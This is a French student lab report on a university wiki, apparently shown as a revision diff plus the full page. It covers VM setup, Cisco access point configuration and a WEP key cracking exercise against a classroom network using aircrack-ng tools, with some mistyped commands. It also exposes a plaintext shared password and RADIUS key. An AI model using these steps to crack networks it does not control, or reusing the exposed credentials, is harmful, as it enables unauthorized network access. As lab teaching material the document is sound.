TP sysres IMA2a5 2021/2022 G5 : Différence entre versions
(→Cassage de clef WEP) |
(→Cassage de clef WEP) |
||
Ligne 290 : | Ligne 290 : | ||
=== Cassage de clef WEP === | === Cassage de clef WEP === | ||
− | Pour cette partie, nous avons cassé la clé WEP qui se nomme "Cracotte | + | Pour cette partie, nous avons cassé la clé WEP qui se nomme "Cracotte 01". Nous commençons par installer l'utilitaire aircrack |
su - | su - | ||
Ligne 307 : | Ligne 307 : | ||
PHOTO | PHOTO | ||
− | On va renommer l'interface en wlan0, nous allons utiliser la commande suivante : | + | On va renommer l'interface en wlan0, nous allons utiliser la commande suivante pour passer la carte Wifi en monitor : |
− | airmon -ng start | + | airmon -ng start wlx40a5ef059e47 |
+ | |||
+ | On va ensuite faire cette commande afin d'écouter les trames Wifi de la clé USB: | ||
+ | |||
+ | airodump -ng wlan0 | ||
+ | |||
+ | On obtient alors les informations suivantes : | ||
+ | |||
+ | BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID | ||
+ | 04:DA:D2:9C:50:50 -40 2 3 4 3 54e WEP WEP cracotte01 | ||
+ | |||
+ | On filtre notre interface : | ||
+ | |||
+ | BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID | ||
+ | 04:DA:D2:9C:50:50 -42 10 30 19 4 3 54e WEP WEP cracotte01 | ||
+ | |||
+ | On lance l'interface dans ce terminal avec la commande suivante : | ||
+ | |||
+ | airodump -ng -c 3 --bssid 04:DA:D2:9C:50:50 wlan0 | ||
+ | |||
+ | On va ouvrir un autre terminal et on lancera le cassage de la clé : | ||
+ | |||
+ | airodump -ng /tmp/cracotte01-01.cap | ||
+ | |||
+ | On obtient : | ||
+ | |||
+ | # BSSID ESSID Encryption | ||
+ | 1 04:DA:D2:9C:50:50 cracotte01 WEP (0 IVs) | ||
+ | |||
+ | Après 5-10min, on obtient le code de la clé Wifi : | ||
+ | |||
+ | PHOTO |
Version du 12 novembre 2021 à 09:46
Sommaire
- 1 TP Protocoles Avancés - SE2A5 - Groupe 5
TP Protocoles Avancés - SE2A5 - Groupe 5
Généralités
Le tableau ci-dessous récapitule l'ensemble des informations qui seront utilisées lors du TP de Réseau sur les Protocoles Avancées.
Groupe | Domaine | Nom VM | Distribution | IPv4 routée | VLAN privé | Réseau local IPv4 | Réseau IPv6 | Réseau IPv6 de secours | Cisco 6509-E | Cisco 9200 | SSID |
---|---|---|---|---|---|---|---|---|---|---|---|
Groupe 5 | rsx-viciot.site | AnimalCrossing | Debian 10 Buster | 193.48.57.165 | 164 (NET-GP4) | 10.60.165.0/24 | 2001:660:4401:60A5::/64 | 2001:7A8:116E:60A5::/64 | 10.60.165.254 | 10.60.165.253 | SE2A5_GP5 |
Architecture réseaux
Câblage
Création d'une machine virtuelle
Création de la machine virtuelle
Commençons par la création de la machine virtuelle. Nous allons commencer par nous connecter en ssh sur le serveur Capbreton situé dans la baie en salle E304, nous utiliserons la commande suivante :
ssh -4 capbreton.plil.info
Nous nous connectons ensuite en superuser sur la machine :
su -
Nous allons exporter
export http_proxy=http://proxy.plil.fr:3128 export https_proxy=http://proxy.plil.fr:3128
La commande de création est la suivante :
xen-create-image --force --hostname=AnimalCrossing --ip=193.48.57.165 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster
On vérifie que notre machine est correctement installée en ouvrant un second terminal et en nous reconnectant à Capbreton. On utilisera la commande suivante:
tail -f /var/log/xen-tools/AnimalCrossing.log
Suite à cela nous aurons un récapitulatif des informations de notre machine virtuelle ainsi que son mot de passe (Conseil : Bien noté le mot de passe !)
Création des disques
Nous allons désormais créer les disques pour notre machine virtuelle, nous allons réaliser un RAID 5, soit 4 disques :
lvcreate -L1G -n AnimalCrossing1 virtual lvcreate -L1G -n AnimalCrossing2 virtual lvcreate -L1G -n AnimalCrossing3 virtual lvcreate -L1G -n AnimalCrossing4 virtual
On augmente ensuite la taille des disques afin de les passer de 1Go à 10Go :
lvextend -L +9G /dev/virtual/AnimalCrossing1 lvextend -L +9G /dev/virtual/AnimalCrossing2 lvextend -L +9G /dev/virtual/AnimalCrossing3 lvextend -L +9G /dev/virtual/AnimalCrossing4
On vérifie l'installation de nos disques avec :
lvdisplay
On obtient le récap suivant :
--- Logical volume --- LV Path /dev/virtual/AnimalCrossing1 LV Name AnimalCrossing1 VG Name virtual LV UUID 8J2E0b-3Np8-Kdb8-h2jR-jCaR-fQlU-a9wklC LV Write Access read/write LV Creation host, time capbreton, 2021-09-23 10:35:45 +0200 LV Status available # open 0 LV Size 10.00 GiB Current LE 2560 Segments 2 Allocation inherit Read ahead sectors auto - currently set to 256 Block device 254:30
Enfin on va formater nos disques :
mke2fs /dev/virtual/AnimalCrossing1 mke2fs /dev/virtual/AnimalCrossing2 mke2fs /dev/virtual/AnimalCrossing3 mke2fs /dev/virtual/AnimalCrossing4
Démarrage
On démarre la machine une première fois afin de pouvoir accéder au fichier vim :
xen create /etc/xen/AnimalCrossing.cfg
Après avoir fait ça, nous faisons la commande suivante :
vi /etc/xen/AnimalCrossing.cfg
Dans le fichier nous allons :
1 - Dans la rubrique "Networking" : Supprimer l'adresse IP, 2 - Toujours dans la rubrique "Networking" : On ajoutera "bridge=IMA2a5" on obtiendra la commande suivante
vif = [ 'mac=00:16:3E:73:B0:3C, bridge=IMA2a5' ]
3 - Dans la rubrique "Disks" : On ajoute le code suivant :
'phy:/dev/virtual/AnimalCrossing1, xvda3, w', 'phy:/dev/virtual/AnimalCrossing2, xvda4, w', 'phy:/dev/virtual/AnimalCrossing3, xvda5, w', 'phy:/dev/virtual/AnimalCrossing4, xvda6, w',
On referme le fichier VIM et on relance notre machine virtuelle :
xen create /etc/xen/AnimalCrossing.cfg xen console AnimalCrossing
On va devoir se connecter et le login sera root
Installation des packages
Configuration
Configuration des routeurs
La configuration des routeurs doit être faite pour les deux routeurs de la salle E304 : 9200 et le ISR4331 ainsi que dans la salle E306 pour le routeur 6509. Pour se faire, plusieurs personnes de la classe ont travaillé dessus. Dans un premier temps Kevin, Quentin et Valentin ont configuré le 9200. Benoit et Belange ont quand à eux configuré le 6509. Pour ma part, j'ai configuré une petite partie de routeur ISR4331.
- DEVELOPER COMMANDES -
Configuration de l'accès WIFI N°2
Commençons par une configuration générale :
ap>enable ap#configure terminal
On se connecte au minicom grâce à la commande :
minicom -s
Puis on changera dans les paramètres la connexion au port USB0 en indiquant :
/dev/ttyUSB0
Ensuite intéressons nous à la configuration du nom de l'hôte :
ap(config)#hostname SE2A5-AP2
Puis de l'accès en SSH :
SE2A5-AP2(config)#aaa new-model SE2A5-AP2(config)#username admin privilege 15 secret glopglop SE2A5-AP2(config)#ip domain-name plil.info SE2A5-AP2(config)#crypto key generate rsa general-keys modulus 2048 SE2A5-AP2(config)#ip ssh version 2 SE2A5-AP2(config)#line vty 0 15 SE2A5-AP2(config-line)#transport input ssh SE2A5-AP2(config-line)#exit
L'accès à la console :
SE2A5-AP2(config)#line console 0 SE2A5-AP2(config-line)#password glopglop SE2A5-AP2(config-line)#exit SE2A5-AP2(config)#aaa new-model SE2A5-AP2(config)#aaa authentication login default local SE2A5-AP2(config)#line con 0 SE2A5-AP2(config)#login authen default SE2A5-AP2(config)#exit
On va sécuriser l'accès :
SE2A5-AP2(config)#service password-encryption SE2A5-AP2(config)#enable secret glopglop SE2A5-AP2(config)#banner motd #Restricted Access#
Configuration l'accès au VLAN 164 :
SE2A5-AP2(config)#aaa authentication login EAP_ANIMALCROSSING group RADIUS_ANIMALCROSSING SE2A5-AP2(config)#radius-server host 193.48.57.165 auth-port 1812 acct-port 1813 key glopglop SE2A5-AP2(config)#aaa group server radius RADIUS_ANIMALCROSSING SE2A5-AP2(config-server)#server 193.48.57.165 auth-port 1812 acct-port 1813 SE2A5-AP2(config-server)#exit SE2A5-AP2(config)#dot11 ssid ANIMALCROSSING2 SE2A5-AP2(config-ssid)#mbssid guest-mode SE2A5-AP2(config-ssid)#vlan 164 SE2A5-AP2(config-ssid)#authentication open eap EAP_ANIMALCROSSING SE2A5-AP2(config-ssid)#authentication network-eap EAP_ANIMALCROSSING SE2A5-AP2(config-ssid)#authentication key-management wpa SE2A5-AP2(config-ssid)#exit SE2A5-AP2(config)#interface dot11radio0.164 SE2A5-AP2(config-subif)#encapsulation dot1q 164 SE2A5-AP2(config-subif)#bridge-group 64 SE2A5-AP2(config-subif)#exit SE2A5-AP2(config)#interface g0.164 SE2A5-AP2(config-subif)#encapsulation dot1q 164 SE2A5-AP2(config-subif)#bridge-group 64 SE2A5-AP2(config-subif)#exit SE2A5-AP2(config)#interface dot11radio 0 SE2A5-AP2(config-if)#no shutdown SE2A5-AP2(config-if)#encryption vlan 164 mode ciphers aes-ccm tkip SE2A5-AP2(config-if)#mbssid SE2A5-AP2(config-if)#ssid ANIMALCROSSING2 SE2A5-AP2(config-if)#exit
Afin de vérifier si notre SSID fonctionne, on va effectuer les commandes suivantes :
SE2A5-AP2#show dot11 bssid
On obtient :
Interface BSSID Guest SSID Dot141Radio0 ecc8.8243.cd40 No ANIMALCROSSING2
On souhaite passer notre Guest de No à Yes pour se faire :
conf t interface do0 no shut exit
On refait la commande :
SE2A5-AP2#show dot11 bssid
On obtient :
Interface BSSID Guest SSID Dot141Radio0 ecc8.8243.cd40 Yes ANIMALCROSSING2
Notre SSID est bien configuré pour le point Wifi N°2.
Configuration de l'accès WIFI N°1
Un autre groupe ayant réaliser la configuration du point d'accès N°1, nous allons juste configurer notre VLAN :
Configuration l'accès au VLAN 164 :
SE2A5-AP1(config)#aaa authentication login EAP_ANIMALCROSSING group RADIUS_ANIMALCROSSING SE2A5-AP1(config)#radius-server host 193.48.57.165 auth-port 1812 acct-port 1813 key glopglop SE2A5-AP1(config)#aaa group server radius RADIUS_ANIMALCROSSING SE2A5-AP1(config-server)#server 193.48.57.165 auth-port 1812 acct-port 1813 SE2A5-AP1(config-server)#exit SE2A5-AP2(config)#dot11 ssid ANIMALCROSSING2 SE2A5-AP2(config-ssid)#mbssid guest-mode SE2A5-AP2(config-ssid)#vlan 164 SE2A5-AP2(config-ssid)#authentication open eap EAP_ANIMALCROSSING SE2A5-AP2(config-ssid)#authentication network-eap EAP_ANIMALCROSSING SE2A5-AP2(config-ssid)#authentication key-management wpa SE2A5-AP2(config-ssid)#exit SE2A5-AP2(config)#interface dot11radio0.164 SE2A5-AP2(config-subif)#encapsulation dot1q 164 SE2A5-AP2(config-subif)#bridge-group 64 SE2A5-AP2(config-subif)#exit SE2A5-AP2(config)#interface g0.164 SE2A5-AP2(config-subif)#encapsulation dot1q 164 SE2A5-AP2(config-subif)#bridge-group 64 SE2A5-AP2(config-subif)#exit SE2A5-AP2(config)#interface dot11radio 0 SE2A5-AP2(config-if)#no shutdown SE2A5-AP2(config-if)#encryption vlan 164 mode ciphers aes-ccm tkip SE2A5-AP2(config-if)#mbssid SE2A5-AP2(config-if)#ssid ANIMALCROSSING2 SE2A5-AP2(config-if)#exit
Exploitation des failles du systèmes
Cassage de clef WEP
Pour cette partie, nous avons cassé la clé WEP qui se nomme "Cracotte 01". Nous commençons par installer l'utilitaire aircrack
su - apt install aircrack -ng
On prendra une clé USB Wifi et on listera les différentes interfaces de notre ordinateur :
lsusb
PHOTO
On réalise les commandes suivants :
airmon -ng
PHOTO
On va renommer l'interface en wlan0, nous allons utiliser la commande suivante pour passer la carte Wifi en monitor :
airmon -ng start wlx40a5ef059e47
On va ensuite faire cette commande afin d'écouter les trames Wifi de la clé USB:
airodump -ng wlan0
On obtient alors les informations suivantes :
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:50 -40 2 3 4 3 54e WEP WEP cracotte01
On filtre notre interface :
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:50 -42 10 30 19 4 3 54e WEP WEP cracotte01
On lance l'interface dans ce terminal avec la commande suivante :
airodump -ng -c 3 --bssid 04:DA:D2:9C:50:50 wlan0
On va ouvrir un autre terminal et on lancera le cassage de la clé :
airodump -ng /tmp/cracotte01-01.cap
On obtient :
# BSSID ESSID Encryption 1 04:DA:D2:9C:50:50 cracotte01 WEP (0 IVs)
Après 5-10min, on obtient le code de la clé Wifi :
PHOTO